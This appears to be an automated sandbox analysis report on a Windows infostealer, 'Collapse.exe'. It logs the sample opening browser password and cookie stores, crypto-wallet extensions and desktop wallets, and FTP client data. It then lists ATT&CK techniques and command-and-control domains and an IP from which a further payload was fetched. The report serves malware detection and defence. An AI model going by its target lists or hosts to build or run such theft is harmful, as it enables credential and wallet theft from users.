                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\Collapse.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: Yara matchFile source: 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Collapse.exe PID: 5924, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Collapse.exe PID: 5924, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin Shares2
                Clipboard Data
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync43
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Collapse.exe37%ReversingLabsWin32.Trojan.Generic
                Collapse.exe32%VirustotalBrowse
                Collapse.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://observerfry.lat/apin0%Avira URL Cloudsafe
                https://observerfry.lat/pi0%Avira URL Cloudsafe
                http://147.45.47.81:80/conhost.exel0%Avira URL Cloudsafe
                https://observerfry.lat/C0%Avira URL Cloudsafe
                https://observerfry.lat/apio0%Avira URL Cloudsafe
                http://147.45.47.81/0%Avira URL Cloudsafe
                http://crl.micro80%Avira URL Cloudsafe
                https://observerfry.lat:443/api7wner3.default-release/key4.dbPK0%Avira URL Cloudsafe
                https://observerfry.lat/apicatinT0%Avira URL Cloudsafe
                https://observerfry.lat/api~0%Avira URL Cloudsafe
                https://observerfry.lat:443/apiocal0%Avira URL Cloudsafe
                https://observerfry.lat:443/api0%Avira URL Cloudsafe
                https://observerfry.lat/api40%Avira URL Cloudsafe
                https://observerfry.lat:443/apin.txtPK0%Avira URL Cloudsafe
                https://observerfry.lat/apifM0%Avira URL Cloudsafe
                https://observerfry.lat/ve0%Avira URL Cloudsafe
                https://observerfry.lat/apiDesk0%Avira URL Cloudsafe
                https://observerfry.lat/30%Avira URL Cloudsafe
                http://147.45.47.81/conhost.exe)0%Avira URL Cloudsafe
                http://147.45.47.81/p0%Avira URL Cloudsafe
                http://147.45.47.81/m0%Avira URL Cloudsafe
                https://observerfry.lat:443/api%0%Avira URL Cloudsafe
                https://observerfry.lat/apifmvh0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                observerfry.lat
                172.67.199.72
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  curverpluch.latfalse
                    high
                    slipperyloo.latfalse
                      high
                      tentabatte.latfalse
                        high
                        manyrestro.latfalse
                          high
                          bashfulacid.latfalse
                            high
                            observerfry.latfalse
                              high
                              wordyfindy.latfalse
                                high
                                https://observerfry.lat/apifalse
                                  high
                                  shapestickyr.latfalse
                                    high
                                    talkynicer.latfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://observerfry.lat/apioCollapse.exe, 00000006.00000003.1317503585.00000000036AF000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1317483559.00000000036A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabCollapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://observerfry.lat/apinCollapse.exe, 00000006.00000003.1404184317.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1405881150.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1689342251.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374993674.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://duckduckgo.com/ac/?q=Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://147.45.47.81/Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://observerfry.lat/piCollapse.exe, 00000006.00000003.1403631246.000000000101C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://observerfry.lat:443/api7wner3.default-release/key4.dbPKCollapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374890812.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1375045759.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1404122051.0000000000F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://observerfry.lat/api~Collapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://observerfry.lat/apicatinTCollapse.exe, 00000006.00000003.1404184317.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1405881150.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1689342251.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://147.45.47.81/conhost.exeCollapse.exe, 00000006.00000003.1687945451.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1690030321.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688339547.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000002.1690013146.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://147.45.47.81:80/conhost.exelCollapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://x1.c.lencr.org/0Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://x1.i.lencr.org/0Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCollapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/products/firefoxgro.allCollapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://observerfry.lat/CCollapse.exe, 00000006.00000003.1318726111.000000000101E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.micro8Collapse.exe, 00000006.00000003.1375521268.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1403986170.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpfalse
